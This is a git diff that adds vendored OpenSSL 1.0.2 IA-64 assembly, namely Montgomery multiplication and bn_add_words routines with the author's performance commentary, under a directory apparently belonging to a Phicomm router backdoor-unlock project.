+	(p5)fcvt.fxu	bj[5]=f0
+	cmp4.le		p12,p13=7,in5	}
+{ .mfi;	(p6)ldf8	bj[4]=[r30],16		// bp[3]
+	(p7)fcvt.fxu	bj[4]=f0
+	cmp4.le		p14,p15=8,in5	}
+{ .mfi;	(p4)ldf8	ni2=[nptr],16		// np[2]
+	(p5)fcvt.fxu	ni2=f0
+	addp4		r28=-1,in5	}
+{ .mfi;	(p6)ldf8	ni3=[r31],16		// np[3]
+	(p7)fcvt.fxu	ni3=f0
+	$ADDP		in4=0,in4	};;
+
+{ .mfi;	ldf8		n0=[in4]
+	fcvt.fxu	tf[1]=f0
+	nop.i		0		}
+
+{ .mfi;	(p8)ldf8	ai4=[aptr],16		// ap[4]
+	(p9)fcvt.fxu	ai4=f0
+	mov		t[0]=r0		}
+{ .mfi;	(p10)ldf8	ai5=[r29],16		// ap[5]
+	(p11)fcvt.fxu	ai5=f0
+	mov		t[1]=r0		}
+{ .mfi;	(p8)ldf8	bj[3]=[bptr],16		// bp[4]
+	(p9)fcvt.fxu	bj[3]=f0
+	mov		t[2]=r0		}
+{ .mfi;	(p10)ldf8	bj[2]=[r30],16		// bp[5]
+	(p11)fcvt.fxu	bj[2]=f0
+	mov		t[3]=r0		}
+{ .mfi;	(p8)ldf8	ni4=[nptr],16		// np[4]
+	(p9)fcvt.fxu	ni4=f0
+	mov		t[4]=r0		}
+{ .mfi;	(p10)ldf8	ni5=[r31],16		// np[5]
+	(p11)fcvt.fxu	ni5=f0
+	mov		t[5]=r0		};;
+
+{ .mfi;	(p12)ldf8	ai6=[aptr],16		// ap[6]
+	(p13)fcvt.fxu	ai6=f0
+	mov		t[6]=r0		}
+{ .mfi;	(p14)ldf8	ai7=[r29],16		// ap[7]
+	(p15)fcvt.fxu	ai7=f0
+	mov		t[7]=r0		}
+{ .mfi;	(p12)ldf8	bj[1]=[bptr],16		// bp[6]
+	(p13)fcvt.fxu	bj[1]=f0
+	mov		ar.lc=r28	}
+{ .mfi;	(p14)ldf8	bj[0]=[r30],16		// bp[7]
+	(p15)fcvt.fxu	bj[0]=f0
+	mov		ar.ec=1		}
+{ .mfi;	(p12)ldf8	ni6=[nptr],16		// np[6]
+	(p13)fcvt.fxu	ni6=f0
+	mov		pr.rot=1<<16	}
+{ .mfb;	(p14)ldf8	ni7=[r31],16		// np[7]
+	(p15)fcvt.fxu	ni7=f0
+	brp.loop.imp	.Louter_8_ctop,.Louter_8_cend-16
+					};;
+
+// The loop is scheduled for 32*n ticks on Itanium 2. Actual attempt
+// to measure with help of Interval Time Counter indicated that the
+// factor is a tad higher: 33 or 34, if not 35. Exact measurement and
+// addressing the issue is problematic, because I don't have access
+// to platform-specific instruction-level profiler. On Itanium it
+// should run in 56*n ticks, because of higher xma latency...
+.Louter_8_ctop:
+	.pred.rel		"mutex",p40,p42
+	.pred.rel		"mutex",p48,p50
+{ .mfi;	(p16)	nop.m		0			// 0:
+	(p16)	xma.hu		ahi[0]=ai0,bj[7],tf[1]	//	ap[0]*b[i]+t[0]
+	(p40)	add		a3=a3,n3	}	//	(p17) a3+=n3
+{ .mfi;	(p42)	add		a3=a3,n3,1
+	(p16)	xma.lu		alo[0]=ai0,bj[7],tf[1]
+	(p16)	nop.i		0		};;
+{ .mii;	(p17)	getf.sig	a7=alo[8]		// 1:
+	(p48)	add		t[6]=t[6],a3		//	(p17) t[6]+=a3
+	(p50)	add		t[6]=t[6],a3,1	};;
+{ .mfi;	(p17)	getf.sig	a8=ahi[8]		// 2:
+	(p17)	xma.hu		nhi[7]=ni6,mj[1],nhi[6]	//	np[6]*m0
+	(p40)	cmp.ltu		p43,p41=a3,n3	}
+{ .mfi;	(p42)	cmp.leu		p43,p41=a3,n3
+	(p17)	xma.lu		nlo[7]=ni6,mj[1],nhi[6]
+	(p16)	nop.i		0		};;
+{ .mii;	(p17)	getf.sig	n5=nlo[6]		// 3:
+	(p48)	cmp.ltu		p51,p49=t[6],a3
+	(p50)	cmp.leu		p51,p49=t[6],a3	};;
+	.pred.rel		"mutex",p41,p43
+	.pred.rel		"mutex",p49,p51
+{ .mfi;	(p16)	nop.m		0			// 4:
+	(p16)	xma.hu		ahi[1]=ai1,bj[7],ahi[0]	//	ap[1]*b[i]
+	(p41)	add		a4=a4,n4	}	//	(p17) a4+=n4
+{ .mfi;	(p43)	add		a4=a4,n4,1
+	(p16)	xma.lu		alo[1]=ai1,bj[7],ahi[0]
+	(p16)	nop.i		0		};;
+{ .mfi;	(p49)	add		t[5]=t[5],a4		// 5:	(p17) t[5]+=a4
+	(p16)	xmpy.lu		mj[0]=alo[0],n0		//	(ap[0]*b[i]+t[0])*n0
+	(p51)	add		t[5]=t[5],a4,1	};;
+{ .mfi;	(p16)	nop.m		0			// 6:
+	(p17)	xma.hu		nhi[8]=ni7,mj[1],nhi[7]	//	np[7]*m0
+	(p41)	cmp.ltu		p42,p40=a4,n4	}
+{ .mfi;	(p43)	cmp.leu		p42,p40=a4,n4
+	(p17)	xma.lu		nlo[8]=ni7,mj[1],nhi[7]
+	(p16)	nop.i		0		};;
+{ .mii;	(p17)	getf.sig	n6=nlo[7]		// 7:
+	(p49)	cmp.ltu		p50,p48=t[5],a4
+	(p51)	cmp.leu		p50,p48=t[5],a4	};;
+	.pred.rel		"mutex",p40,p42
+	.pred.rel		"mutex",p48,p50
+{ .mfi;	(p16)	nop.m		0			// 8:
+	(p16)	xma.hu		ahi[2]=ai2,bj[7],ahi[1]	//	ap[2]*b[i]
+	(p40)	add		a5=a5,n5	}	//	(p17) a5+=n5
+{ .mfi;	(p42)	add		a5=a5,n5,1
+	(p16)	xma.lu		alo[2]=ai2,bj[7],ahi[1]
+	(p16)	nop.i		0		};;
+{ .mii;	(p16)	getf.sig	a1=alo[1]		// 9:
+	(p48)	add		t[4]=t[4],a5		//	p(17) t[4]+=a5
+	(p50)	add		t[4]=t[4],a5,1	};;
+{ .mfi;	(p16)	nop.m		0			// 10:
+	(p16)	xma.hu		nhi[0]=ni0,mj[0],alo[0]	//	np[0]*m0
+	(p40)	cmp.ltu		p43,p41=a5,n5	}
+{ .mfi;	(p42)	cmp.leu		p43,p41=a5,n5
+	(p16)	xma.lu		nlo[0]=ni0,mj[0],alo[0]
+	(p16)	nop.i		0		};;
+{ .mii;	(p17)	getf.sig	n7=nlo[8]		// 11:
+	(p48)	cmp.ltu		p51,p49=t[4],a5
+	(p50)	cmp.leu		p51,p49=t[4],a5	};;
+	.pred.rel		"mutex",p41,p43
+	.pred.rel		"mutex",p49,p51
+{ .mfi;	(p17)	getf.sig	n8=nhi[8]		// 12:
+	(p16)	xma.hu		ahi[3]=ai3,bj[7],ahi[2]	//	ap[3]*b[i]
+	(p41)	add		a6=a6,n6	}	//	(p17) a6+=n6
+{ .mfi;	(p43)	add		a6=a6,n6,1
+	(p16)	xma.lu		alo[3]=ai3,bj[7],ahi[2]
+	(p16)	nop.i		0		};;
+{ .mii;	(p16)	getf.sig	a2=alo[2]		// 13:
+	(p49)	add		t[3]=t[3],a6		//	(p17) t[3]+=a6
+	(p51)	add		t[3]=t[3],a6,1	};;
+{ .mfi;	(p16)	nop.m		0			// 14:
+	(p16)	xma.hu		nhi[1]=ni1,mj[0],nhi[0]	//	np[1]*m0
+	(p41)	cmp.ltu		p42,p40=a6,n6	}
+{ .mfi;	(p43)	cmp.leu		p42,p40=a6,n6
+	(p16)	xma.lu		nlo[1]=ni1,mj[0],nhi[0]
+	(p16)	nop.i		0		};;
+{ .mii;	(p16)	nop.m		0			// 15:
+	(p49)	cmp.ltu		p50,p48=t[3],a6
+	(p51)	cmp.leu		p50,p48=t[3],a6	};;
+	.pred.rel		"mutex",p40,p42
+	.pred.rel		"mutex",p48,p50
+{ .mfi;	(p16)	nop.m		0			// 16:
+	(p16)	xma.hu		ahi[4]=ai4,bj[7],ahi[3]	//	ap[4]*b[i]
+	(p40)	add		a7=a7,n7	}	//	(p17) a7+=n7
+{ .mfi;	(p42)	add		a7=a7,n7,1
+	(p16)	xma.lu		alo[4]=ai4,bj[7],ahi[3]
+	(p16)	nop.i		0		};;
+{ .mii;	(p16)	getf.sig	a3=alo[3]		// 17:
+	(p48)	add		t[2]=t[2],a7		//	(p17) t[2]+=a7
+	(p50)	add		t[2]=t[2],a7,1	};;
+{ .mfi;	(p16)	nop.m		0			// 18:
+	(p16)	xma.hu		nhi[2]=ni2,mj[0],nhi[1]	//	np[2]*m0
+	(p40)	cmp.ltu		p43,p41=a7,n7	}
+{ .mfi;	(p42)	cmp.leu		p43,p41=a7,n7
+	(p16)	xma.lu		nlo[2]=ni2,mj[0],nhi[1]
+	(p16)	nop.i		0		};;
+{ .mii;	(p16)	getf.sig	n1=nlo[1]		// 19:
+	(p48)	cmp.ltu		p51,p49=t[2],a7
+	(p50)	cmp.leu		p51,p49=t[2],a7	};;
+	.pred.rel		"mutex",p41,p43
+	.pred.rel		"mutex",p49,p51
+{ .mfi;	(p16)	nop.m		0			// 20:
+	(p16)	xma.hu		ahi[5]=ai5,bj[7],ahi[4]	//	ap[5]*b[i]
+	(p41)	add		a8=a8,n8	}	//	(p17) a8+=n8
+{ .mfi;	(p43)	add		a8=a8,n8,1
+	(p16)	xma.lu		alo[5]=ai5,bj[7],ahi[4]
+	(p16)	nop.i		0		};;
+{ .mii;	(p16)	getf.sig	a4=alo[4]		// 21:
+	(p49)	add		t[1]=t[1],a8		//	(p17) t[1]+=a8
+	(p51)	add		t[1]=t[1],a8,1	};;
+{ .mfi;	(p16)	nop.m		0			// 22:
+	(p16)	xma.hu		nhi[3]=ni3,mj[0],nhi[2]	//	np[3]*m0
+	(p41)	cmp.ltu		p42,p40=a8,n8	}
+{ .mfi;	(p43)	cmp.leu		p42,p40=a8,n8
+	(p16)	xma.lu		nlo[3]=ni3,mj[0],nhi[2]
+	(p16)	nop.i		0		};;
+{ .mii;	(p16)	getf.sig	n2=nlo[2]		// 23:
+	(p49)	cmp.ltu		p50,p48=t[1],a8
+	(p51)	cmp.leu		p50,p48=t[1],a8	};;
+{ .mfi;	(p16)	nop.m		0			// 24:
+	(p16)	xma.hu		ahi[6]=ai6,bj[7],ahi[5]	//	ap[6]*b[i]
+	(p16)	add		a1=a1,n1	}	//	(p16) a1+=n1
+{ .mfi;	(p16)	nop.m		0
+	(p16)	xma.lu		alo[6]=ai6,bj[7],ahi[5]
+	(p17)	mov		t[0]=r0		};;
+{ .mii;	(p16)	getf.sig	a5=alo[5]		// 25:
+	(p16)	add		t0=t[7],a1		//	(p16) t[7]+=a1
+	(p42)	add		t[0]=t[0],r0,1	};;
+{ .mfi;	(p16)	setf.sig	tf[0]=t0		// 26:
+	(p16)	xma.hu		nhi[4]=ni4,mj[0],nhi[3]	//	np[4]*m0
+	(p50)	add		t[0]=t[0],r0,1	}
+{ .mfi;	(p16)	cmp.ltu.unc	p42,p40=a1,n1
+	(p16)	xma.lu		nlo[4]=ni4,mj[0],nhi[3]
+	(p16)	nop.i		0		};;
+{ .mii;	(p16)	getf.sig	n3=nlo[3]		// 27:
+	(p16)	cmp.ltu.unc	p50,p48=t0,a1
+	(p16)	nop.i		0		};;
+	.pred.rel		"mutex",p40,p42
+	.pred.rel		"mutex",p48,p50
+{ .mfi;	(p16)	nop.m		0			// 28:
+	(p16)	xma.hu		ahi[7]=ai7,bj[7],ahi[6]	//	ap[7]*b[i]
+	(p40)	add		a2=a2,n2	}	//	(p16) a2+=n2
+{ .mfi;	(p42)	add		a2=a2,n2,1
+	(p16)	xma.lu		alo[7]=ai7,bj[7],ahi[6]
+	(p16)	nop.i		0		};;
+{ .mii;	(p16)	getf.sig	a6=alo[6]		// 29:
+	(p48)	add		t[6]=t[6],a2		//	(p16) t[6]+=a2
+	(p50)	add		t[6]=t[6],a2,1	};;
+{ .mfi;	(p16)	nop.m		0			// 30:
+	(p16)	xma.hu		nhi[5]=ni5,mj[0],nhi[4]	//	np[5]*m0
+	(p40)	cmp.ltu		p41,p39=a2,n2	}
+{ .mfi;	(p42)	cmp.leu		p41,p39=a2,n2
+	(p16)	xma.lu		nlo[5]=ni5,mj[0],nhi[4]
+	(p16)	nop.i		0		};;
+{ .mfi;	(p16)	getf.sig	n4=nlo[4]		// 31:
+	(p16)	nop.f		0
+	(p48)	cmp.ltu		p49,p47=t[6],a2	}
+{ .mfb;	(p50)	cmp.leu		p49,p47=t[6],a2
+	(p16)	nop.f		0
+	br.ctop.sptk.many	.Louter_8_ctop	};;
+.Louter_8_cend:
+
+// above loop has to execute one more time, without (p16), which is
+// replaced with merged move of np[8] to GPR bank
+	.pred.rel		"mutex",p40,p42
+	.pred.rel		"mutex",p48,p50
+{ .mmi;	(p0)	getf.sig	n1=ni0			// 0:
+	(p40)	add		a3=a3,n3		//	(p17) a3+=n3
+	(p42)	add		a3=a3,n3,1	};;
+{ .mii;	(p17)	getf.sig	a7=alo[8]		// 1:
+	(p48)	add		t[6]=t[6],a3		//	(p17) t[6]+=a3
+	(p50)	add		t[6]=t[6],a3,1	};;
+{ .mfi;	(p17)	getf.sig	a8=ahi[8]		// 2:
+	(p17)	xma.hu		nhi[7]=ni6,mj[1],nhi[6]	//	np[6]*m0
+	(p40)	cmp.ltu		p43,p41=a3,n3	}
+{ .mfi;	(p42)	cmp.leu		p43,p41=a3,n3
+	(p17)	xma.lu		nlo[7]=ni6,mj[1],nhi[6]
+	(p0)	nop.i		0		};;
+{ .mii;	(p17)	getf.sig	n5=nlo[6]		// 3:
+	(p48)	cmp.ltu		p51,p49=t[6],a3
+	(p50)	cmp.leu		p51,p49=t[6],a3	};;
+	.pred.rel		"mutex",p41,p43
+	.pred.rel		"mutex",p49,p51
+{ .mmi;	(p0)	getf.sig	n2=ni1			// 4:
+	(p41)	add		a4=a4,n4		//	(p17) a4+=n4
+	(p43)	add		a4=a4,n4,1	};;
+{ .mfi;	(p49)	add		t[5]=t[5],a4		// 5:	(p17) t[5]+=a4
+	(p0)	nop.f		0
+	(p51)	add		t[5]=t[5],a4,1	};;
+{ .mfi;	(p0)	getf.sig	n3=ni2			// 6:
+	(p17)	xma.hu		nhi[8]=ni7,mj[1],nhi[7]	//	np[7]*m0
+	(p41)	cmp.ltu		p42,p40=a4,n4	}
+{ .mfi;	(p43)	cmp.leu		p42,p40=a4,n4
+	(p17)	xma.lu		nlo[8]=ni7,mj[1],nhi[7]
+	(p0)	nop.i		0		};;
+{ .mii;	(p17)	getf.sig	n6=nlo[7]		// 7:
+	(p49)	cmp.ltu		p50,p48=t[5],a4
+	(p51)	cmp.leu		p50,p48=t[5],a4	};;
+	.pred.rel		"mutex",p40,p42
+	.pred.rel		"mutex",p48,p50
+{ .mii;	(p0)	getf.sig	n4=ni3			// 8:
+	(p40)	add		a5=a5,n5		//	(p17) a5+=n5
+	(p42)	add		a5=a5,n5,1	};;
+{ .mii;	(p0)	nop.m		0			// 9:
+	(p48)	add		t[4]=t[4],a5		//	p(17) t[4]+=a5
+	(p50)	add		t[4]=t[4],a5,1	};;
+{ .mii;	(p0)	nop.m		0			// 10:
+	(p40)	cmp.ltu		p43,p41=a5,n5
+	(p42)	cmp.leu		p43,p41=a5,n5	};;
+{ .mii;	(p17)	getf.sig	n7=nlo[8]		// 11:
+	(p48)	cmp.ltu		p51,p49=t[4],a5
+	(p50)	cmp.leu		p51,p49=t[4],a5	};;
+	.pred.rel		"mutex",p41,p43
+	.pred.rel		"mutex",p49,p51
+{ .mii;	(p17)	getf.sig	n8=nhi[8]		// 12:
+	(p41)	add		a6=a6,n6		//	(p17) a6+=n6
+	(p43)	add		a6=a6,n6,1	};;
+{ .mii;	(p0)	getf.sig	n5=ni4			// 13:
+	(p49)	add		t[3]=t[3],a6		//	(p17) t[3]+=a6
+	(p51)	add		t[3]=t[3],a6,1	};;
+{ .mii;	(p0)	nop.m		0			// 14:
+	(p41)	cmp.ltu		p42,p40=a6,n6
+	(p43)	cmp.leu		p42,p40=a6,n6	};;
+{ .mii;	(p0)	getf.sig	n6=ni5			// 15:
+	(p49)	cmp.ltu		p50,p48=t[3],a6
+	(p51)	cmp.leu		p50,p48=t[3],a6	};;
+	.pred.rel		"mutex",p40,p42
+	.pred.rel		"mutex",p48,p50
+{ .mii;	(p0)	nop.m		0			// 16:
+	(p40)	add		a7=a7,n7		//	(p17) a7+=n7
+	(p42)	add		a7=a7,n7,1	};;
+{ .mii;	(p0)	nop.m		0			// 17:
+	(p48)	add		t[2]=t[2],a7		//	(p17) t[2]+=a7
+	(p50)	add		t[2]=t[2],a7,1	};;
+{ .mii;	(p0)	nop.m		0			// 18:
+	(p40)	cmp.ltu		p43,p41=a7,n7
+	(p42)	cmp.leu		p43,p41=a7,n7	};;
+{ .mii;	(p0)	getf.sig	n7=ni6			// 19:
+	(p48)	cmp.ltu		p51,p49=t[2],a7
+	(p50)	cmp.leu		p51,p49=t[2],a7	};;
+	.pred.rel		"mutex",p41,p43
+	.pred.rel		"mutex",p49,p51
+{ .mii;	(p0)	nop.m		0			// 20:
+	(p41)	add		a8=a8,n8		//	(p17) a8+=n8
+	(p43)	add		a8=a8,n8,1	};;
+{ .mmi;	(p0)	nop.m		0			// 21:
+	(p49)	add		t[1]=t[1],a8		//	(p17) t[1]+=a8
+	(p51)	add		t[1]=t[1],a8,1	}
+{ .mmi;	(p17)	mov		t[0]=r0
+	(p41)	cmp.ltu		p42,p40=a8,n8
+	(p43)	cmp.leu		p42,p40=a8,n8	};;
+{ .mmi;	(p0)	getf.sig	n8=ni7			// 22:
+	(p49)	cmp.ltu		p50,p48=t[1],a8
+	(p51)	cmp.leu		p50,p48=t[1],a8	}
+{ .mmi;	(p42)	add		t[0]=t[0],r0,1
+	(p0)	add		r16=-7*16,prevsp
+	(p0)	add		r17=-6*16,prevsp	};;
+
+// subtract np[8] from carrybit|tmp[8]
+// carrybit|tmp[8] layout upon exit from above loop is:
+//	t[0]|t[1]|t[2]|t[3]|t[4]|t[5]|t[6]|t[7]|t0 (least significant)
+{ .mmi;	(p50)add	t[0]=t[0],r0,1
+	add		r18=-5*16,prevsp
+	sub		n1=t0,n1	};;
+{ .mmi;	cmp.gtu		p34,p32=n1,t0;;
+	.pred.rel	"mutex",p32,p34
+	(p32)sub	n2=t[7],n2
+	(p34)sub	n2=t[7],n2,1	};;
+{ .mii;	(p32)cmp.gtu	p35,p33=n2,t[7]
+	(p34)cmp.geu	p35,p33=n2,t[7];;
+	.pred.rel	"mutex",p33,p35
+	(p33)sub	n3=t[6],n3	}
+{ .mmi;	(p35)sub	n3=t[6],n3,1;;
+	(p33)cmp.gtu	p34,p32=n3,t[6]
+	(p35)cmp.geu	p34,p32=n3,t[6]	};;
+	.pred.rel	"mutex",p32,p34
+{ .mii;	(p32)sub	n4=t[5],n4
+	(p34)sub	n4=t[5],n4,1;;
+	(p32)cmp.gtu	p35,p33=n4,t[5]	}
+{ .mmi;	(p34)cmp.geu	p35,p33=n4,t[5];;
+	.pred.rel	"mutex",p33,p35
+	(p33)sub	n5=t[4],n5
+	(p35)sub	n5=t[4],n5,1	};;
+{ .mii;	(p33)cmp.gtu	p34,p32=n5,t[4]
+	(p35)cmp.geu	p34,p32=n5,t[4];;
+	.pred.rel	"mutex",p32,p34
+	(p32)sub	n6=t[3],n6	}
+{ .mmi;	(p34)sub	n6=t[3],n6,1;;
+	(p32)cmp.gtu	p35,p33=n6,t[3]
+	(p34)cmp.geu	p35,p33=n6,t[3]	};;
+	.pred.rel	"mutex",p33,p35
+{ .mii;	(p33)sub	n7=t[2],n7
+	(p35)sub	n7=t[2],n7,1;;
+	(p33)cmp.gtu	p34,p32=n7,t[2]	}
+{ .mmi;	(p35)cmp.geu	p34,p32=n7,t[2];;
+	.pred.rel	"mutex",p32,p34
+	(p32)sub	n8=t[1],n8
+	(p34)sub	n8=t[1],n8,1	};;
+{ .mii;	(p32)cmp.gtu	p35,p33=n8,t[1]
+	(p34)cmp.geu	p35,p33=n8,t[1];;
+	.pred.rel	"mutex",p33,p35
+	(p33)sub	a8=t[0],r0	}
+{ .mmi;	(p35)sub	a8=t[0],r0,1;;
+	(p33)cmp.gtu	p34,p32=a8,t[0]
+	(p35)cmp.geu	p34,p32=a8,t[0]	};;
+
+// save the result, either tmp[num] or tmp[num]-np[num]
+	.pred.rel	"mutex",p32,p34
+{ .mmi;	(p32)st8	[rptr]=n1,8
+	(p34)st8	[rptr]=t0,8
+	add		r19=-4*16,prevsp};;
+{ .mmb;	(p32)st8	[rptr]=n2,8
+	(p34)st8	[rptr]=t[7],8
+	(p5)br.cond.dpnt.few	.Ldone	};;
+{ .mmb;	(p32)st8	[rptr]=n3,8
+	(p34)st8	[rptr]=t[6],8
+	(p7)br.cond.dpnt.few	.Ldone	};;
+{ .mmb;	(p32)st8	[rptr]=n4,8
+	(p34)st8	[rptr]=t[5],8
+	(p9)br.cond.dpnt.few	.Ldone	};;
+{ .mmb;	(p32)st8	[rptr]=n5,8
+	(p34)st8	[rptr]=t[4],8
+	(p11)br.cond.dpnt.few	.Ldone	};;
+{ .mmb;	(p32)st8	[rptr]=n6,8
+	(p34)st8	[rptr]=t[3],8
+	(p13)br.cond.dpnt.few	.Ldone	};;
+{ .mmb;	(p32)st8	[rptr]=n7,8
+	(p34)st8	[rptr]=t[2],8
+	(p15)br.cond.dpnt.few	.Ldone	};;
+{ .mmb;	(p32)st8	[rptr]=n8,8
+	(p34)st8	[rptr]=t[1],8
+	nop.b		0		};;
+.Ldone:						// epilogue
+{ .mmi;	ldf.fill	f16=[r16],64
+	ldf.fill	f17=[r17],64
+	nop.i		0		}
+{ .mmi;	ldf.fill	f18=[r18],64
+	ldf.fill	f19=[r19],64
+	mov		pr=prevpr,0x1ffff	};;
+{ .mmi;	ldf.fill	f20=[r16]
+	ldf.fill	f21=[r17]
+	mov		ar.lc=prevlc	}
+{ .mmi;	ldf.fill	f22=[r18]
+	ldf.fill	f23=[r19]
+	mov		ret0=1		}	// signal "handled"
+{ .mib;	rum		1<<5
+	.restore	sp
+	mov		sp=prevsp
+	br.ret.sptk.many	b0	};;
+.endp	bn_mul_mont_8#
+
+.type	copyright#,\@object
+copyright:
+stringz	"Montgomery multiplication for IA-64, CRYPTOGAMS by <appro\@openssl.org>"
+___
+
+$output=shift and open STDOUT,">$output";
+print $code;
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/ia64.S b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/ia64.S
new file mode 100644
index 0000000..951abc5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/ia64.S
@@ -0,0 +1,1555 @@
+.explicit
+.text
+.ident	"ia64.S, Version 2.1"
+.ident	"IA-64 ISA artwork by Andy Polyakov <appro@fy.chalmers.se>"
+
+//
+// ====================================================================
+// Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
+// project.
+//
+// Rights for redistribution and usage in source and binary forms are
+// granted according to the OpenSSL license. Warranty of any kind is
+// disclaimed.
+// ====================================================================
+//
+// Version 2.x is Itanium2 re-tune. Few words about how Itanum2 is
+// different from Itanium to this module viewpoint. Most notably, is it
+// "wider" than Itanium? Can you experience loop scalability as
+// discussed in commentary sections? Not really:-( Itanium2 has 6
+// integer ALU ports, i.e. it's 2 ports wider, but it's not enough to
+// spin twice as fast, as I need 8 IALU ports. Amount of floating point
+// ports is the same, i.e. 2, while I need 4. In other words, to this
+// module Itanium2 remains effectively as "wide" as Itanium. Yet it's
+// essentially different in respect to this module, and a re-tune was
+// required. Well, because some intruction latencies has changed. Most
+// noticeably those intensively used:
+//
+//			Itanium	Itanium2
+//	ldf8		9	6		L2 hit
+//	ld8		2	1		L1 hit
+//	getf		2	5
+//	xma[->getf]	7[+1]	4[+0]
+//	add[->st8]	1[+1]	1[+0]
+//
+// What does it mean? You might ratiocinate that the original code
+// should run just faster... Because sum of latencies is smaller...
+// Wrong! Note that getf latency increased. This means that if a loop is
+// scheduled for lower latency (as they were), then it will suffer from
+// stall condition and the code will therefore turn anti-scalable, e.g.
+// original bn_mul_words spun at 5*n or 2.5 times slower than expected
+// on Itanium2! What to do? Reschedule loops for Itanium2? But then
+// Itanium would exhibit anti-scalability. So I've chosen to reschedule
+// for worst latency for every instruction aiming for best *all-round*
+// performance.  
+
+// Q.	How much faster does it get?
+// A.	Here is the output from 'openssl speed rsa dsa' for vanilla
+//	0.9.6a compiled with gcc version 2.96 20000731 (Red Hat
+//	Linux 7.1 2.96-81):
+//
+//	                  sign    verify    sign/s verify/s
+//	rsa  512 bits   0.0036s   0.0003s    275.3   2999.2
+//	rsa 1024 bits   0.0203s   0.0011s     49.3    894.1
+//	rsa 2048 bits   0.1331s   0.0040s      7.5    250.9
+//	rsa 4096 bits   0.9270s   0.0147s      1.1     68.1
+//	                  sign    verify    sign/s verify/s
+//	dsa  512 bits   0.0035s   0.0043s    288.3    234.8
+//	dsa 1024 bits   0.0111s   0.0135s     90.0     74.2
+//
+//	And here is similar output but for this assembler
+//	implementation:-)
+//
+//	                  sign    verify    sign/s verify/s
+//	rsa  512 bits   0.0021s   0.0001s    549.4   9638.5
+//	rsa 1024 bits   0.0055s   0.0002s    183.8   4481.1
+//	rsa 2048 bits   0.0244s   0.0006s     41.4   1726.3
+//	rsa 4096 bits   0.1295s   0.0018s      7.7    561.5
+//	                  sign    verify    sign/s verify/s
+//	dsa  512 bits   0.0012s   0.0013s    891.9    756.6
+//	dsa 1024 bits   0.0023s   0.0028s    440.4    376.2
+//	
+//	Yes, you may argue that it's not fair comparison as it's
+//	possible to craft the C implementation with BN_UMULT_HIGH
+//	inline assembler macro. But of course! Here is the output
+//	with the macro:
+//
+//	                  sign    verify    sign/s verify/s
+//	rsa  512 bits   0.0020s   0.0002s    495.0   6561.0
+//	rsa 1024 bits   0.0086s   0.0004s    116.2   2235.7
+//	rsa 2048 bits   0.0519s   0.0015s     19.3    667.3
+//	rsa 4096 bits   0.3464s   0.0053s      2.9    187.7
+//	                  sign    verify    sign/s verify/s
+//	dsa  512 bits   0.0016s   0.0020s    613.1    510.5
+//	dsa 1024 bits   0.0045s   0.0054s    221.0    183.9
+//
+//	My code is still way faster, huh:-) And I believe that even
+//	higher performance can be achieved. Note that as keys get
+//	longer, performance gain is larger. Why? According to the
+//	profiler there is another player in the field, namely
+//	BN_from_montgomery consuming larger and larger portion of CPU
+//	time as keysize decreases. I therefore consider putting effort
+//	to assembler implementation of the following routine:
+//
+//	void bn_mul_add_mont (BN_ULONG *rp,BN_ULONG *np,int nl,BN_ULONG n0)
+//	{
+//	int      i,j;
+//	BN_ULONG v;
+//
+//	for (i=0; i<nl; i++)
+//		{
+//		v=bn_mul_add_words(rp,np,nl,(rp[0]*n0)&BN_MASK2);
+//		nrp++;
+//		rp++;
+//		if (((nrp[-1]+=v)&BN_MASK2) < v)
+//			for (j=0; ((++nrp[j])&BN_MASK2) == 0; j++) ;
+//		}
+//	}
+//
+//	It might as well be beneficial to implement even combaX
+//	variants, as it appears as it can literally unleash the
+//	performance (see comment section to bn_mul_comba8 below).
+//
+//	And finally for your reference the output for 0.9.6a compiled
+//	with SGIcc version 0.01.0-12 (keep in mind that for the moment
+//	of this writing it's not possible to convince SGIcc to use
+//	BN_UMULT_HIGH inline assembler macro, yet the code is fast,
+//	i.e. for a compiler generated one:-):
+//
+//	                  sign    verify    sign/s verify/s
+//	rsa  512 bits   0.0022s   0.0002s    452.7   5894.3
+//	rsa 1024 bits   0.0097s   0.0005s    102.7   2002.9
+//	rsa 2048 bits   0.0578s   0.0017s     17.3    600.2
+//	rsa 4096 bits   0.3838s   0.0061s      2.6    164.5
+//	                  sign    verify    sign/s verify/s
+//	dsa  512 bits   0.0018s   0.0022s    547.3    459.6
+//	dsa 1024 bits   0.0051s   0.0062s    196.6    161.3
+//
+//	Oh! Benchmarks were performed on 733MHz Lion-class Itanium
+//	system running Redhat Linux 7.1 (very special thanks to Ray
+//	McCaffity of Williams Communications for providing an account).
+//
+// Q.	What's the heck with 'rum 1<<5' at the end of every function?
+// A.	Well, by clearing the "upper FP registers written" bit of the
+//	User Mask I want to excuse the kernel from preserving upper
+//	(f32-f128) FP register bank over process context switch, thus
+//	minimizing bus bandwidth consumption during the switch (i.e.
+//	after PKI opration completes and the program is off doing
+//	something else like bulk symmetric encryption). Having said
+//	this, I also want to point out that it might be good idea
+//	to compile the whole toolkit (as well as majority of the
+//	programs for that matter) with -mfixed-range=f32-f127 command
+//	line option. No, it doesn't prevent the compiler from writing
+//	to upper bank, but at least discourages to do so. If you don't
+//	like the idea you have the option to compile the module with
+//	-Drum=nop.m in command line.
+//
+
+#if defined(_HPUX_SOURCE) && !defined(_LP64)
+#define	ADDP	addp4
+#else
+#define	ADDP	add
+#endif
+
+#if 1
+//
+// bn_[add|sub]_words routines.
+//
+// Loops are spinning in 2*(n+5) ticks on Itanuim (provided that the
+// data reside in L1 cache, i.e. 2 ticks away). It's possible to
+// compress the epilogue and get down to 2*n+6, but at the cost of
+// scalability (the neat feature of this implementation is that it
+// shall automagically spin in n+5 on "wider" IA-64 implementations:-)
+// I consider that the epilogue is short enough as it is to trade tiny
+// performance loss on Itanium for scalability.
+//
+// BN_ULONG bn_add_words(BN_ULONG *rp, BN_ULONG *ap, BN_ULONG *bp,int num)
+//
+.global	bn_add_words#
+.proc	bn_add_words#
+.align	64
+.skip	32	// makes the loop body aligned at 64-byte boundary
+bn_add_words:
+	.prologue
+	.save	ar.pfs,r2
+{ .mii;	alloc		r2=ar.pfs,4,12,0,16
+	cmp4.le		p6,p0=r35,r0	};;
+{ .mfb;	mov		r8=r0			// return value
+(p6)	br.ret.spnt.many	b0	};;
+
